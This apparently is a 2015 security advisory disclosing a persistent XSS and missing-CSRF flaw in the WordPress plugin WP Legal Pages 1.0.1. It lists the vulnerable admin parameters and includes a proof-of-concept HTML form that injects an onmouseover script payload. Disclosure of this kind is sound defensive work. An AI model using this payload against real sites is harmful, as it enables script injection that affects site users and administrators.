Subject: Persistent Cross-Site Scripting (XSS) in WP Legal Pages 1.0.1
Date: Fri, 21 Aug 2015 12:07:32 +0200

Hello,

Plugin: WP Legal Pages 1.0.1 https://wordpress.org/plugins/wplegalpages/

1. Persistent Cross-Site Scripting (XSS)

Authenticated administrators can store html/js code (there is no CSRF protection).

Method: POST
Url: http://localhost/wp-admin/admin.php?page=legal-pages
Vulnerable parameters: lp-domain-name, lp-business-name, lp-phone, lp-street, lp-city-state, lp-country, lp-email, lp-address, lp-niche

Example PHP callstack:
/wplegalpages/adminSetting.php:91

Verification:
--
<form method="POST" action="http://localhost/wp-admin/admin.php?page=legal-pages" />
<input type="text" name="lp-gsubmit" value='Save' />
<input type="text" name="lp-domain-name" value='" onmouseover=alert(1) />'>
<input type="submit" />
</form>
--


--
Regards,
Marcin Probola,